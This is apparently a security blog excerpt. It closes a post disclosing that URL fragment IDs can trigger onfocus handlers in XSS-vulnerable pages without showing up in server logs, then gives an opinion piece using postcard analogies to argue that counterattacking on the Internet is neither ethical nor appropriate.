So I think the benefit far outweighs the risk – now defenders can know that an onfocus handler will be triggered by a fragment ID in a URL, and that the fragment ID will not appear in their log files, because it’s not sent to the server.
I’ve already contacted Microsoft’s Security team and had the response that they don’t think it’s a security problem. They’ve said they’ll put me in touch with the Internet Explorer team for their comments – and while I haven’t heard anything yet, I’ll update this blog when / if they do.
In general, I believe that the right thing to do with security issues is to engage in coordinated disclosure, because the developer or vendor is generally best suited to addressing specific flaws. In this case, the flaw is general, in that it’s every site that is already vulnerable to XSS or HTML injection that allows the creation or modification of an “onfocus” event handler. So I can’t coordinate.
The best I can do is communicate, and this is the best I know how.
I’m putting this post in the “Programmer Hubris” section, but it’s really not the programmers this time, it’s the managers. And the lawyers, apparently.
Well, yeah, it always does, and this time what set me off is an NPR article by Tom Gjelten in a series they’re currently doing on “cybersecurity”.
This article probably had a bunch of men talking to NPR with expressions such as “hell, yeah!” and “it’s about time!”, or even the more balanced “well, the best defence is a good offence”.
Absolute rubbish. Pure codswallop.
Kind of, and no.
We’re certainly not being “attacked” in the manner described by analogy in the article.
"If you’re just standing up taking blows, the adversary will ultimately hit you hard enough that you fall to the ground and lose the match. You need to hit back." [says Dmitri Alperovitch, CrowdStrike’s co-founder.]
Yeah, except we’re not taking blows, and this isn’t boxing, and they’re not hitting us hard.
"What we need to do is get rid of the attackers and take away their tools and learn where their hideouts are and flush them out," [says Greg Hoglund, co-founder of HBGary, another firm known for being hacked by a bunch of anonymous nerds that he bragged about being all over]
That’s far closer to reality, but the people whose job it is to do that are the duly appointed law enforcement operatives who are able to enforce the law.
"It’s [like] the government sees a missile heading for your company’s headquarters, and the government just yells, ‘Incoming!’ " Alperovitch says. "It’s doing nothing to prevent it, nothing to stop it [and] nothing to retaliate against the adversary." [says Alperovitch again]
No, it’s not really like that at all.
There is no missile. There is no boxer. There’s a guy sending you postcards.
Yep, pretty much exactly that.
Every packet that comes at you from the Internet is much like a postcard. It’s got a from address (of sorts) and a to address, and all the information inside the packet is readable. [That’s why encryption is applied to all your important transactions]
There are a number of ways. You might be receiving far more postcards than you can legitimately handle, making it really difficult to assess which are the good postcards, and which are the bad ones. So, you contact the postman, and let him know this, and he tracks down (with the aid of the postal inspectors) who’s sending them, and stops carrying those postcards to you. In the meantime, you learn how to spot the obvious crappy postcards and throw them away – and when you use a machine to do this, it’s a lot less of a problem. That’s a denial of service attack.
Then there’s an attack against your web site. Pretty much, that equates to the postcard sender learning that there’s someone reading the postcards, whose job it is to do pretty much what the postcards tell them to do. So he sends postcards that say “punch the nearest person to you really hard in the face”. Obviously a few successes of this sort lead you to firing the idiot who’s punching his co-workers, and instead training the next guy as to what jobs he’s supposed to do on behalf of the postcard senders.
I’m sure that my smart readers can think up their own postcard-based analogies of other attacks that go on, now that you’ve seen these two examples.
Sure, send postcards, but unless you want the postman to be discarding all your outgoing mail, or the law enforcement types to turn up at your doorstep, those postcards had better not be harassing or inappropriate.
Even if you think you’re limiting your behaviour to that which the postman won’t notice as abusive, there’s the other issue with postcards. There’s no guarantee that they were sent from the address stated, and even if they were sent from there, there is no reason to believe that they were official communications.
All it takes is for some hacker to launch an attack from a hospital’s network space, and you’re now responsible for attacking an innocent target where lives could actually be at risk. [Sure, if that were the case, the hospital has shocking security issues of its own, but can you live with that rationalisation if your response to someone attacking your site winds up killing someone?]
I don’t think that counterattack on the Internet is ethical or appropriate.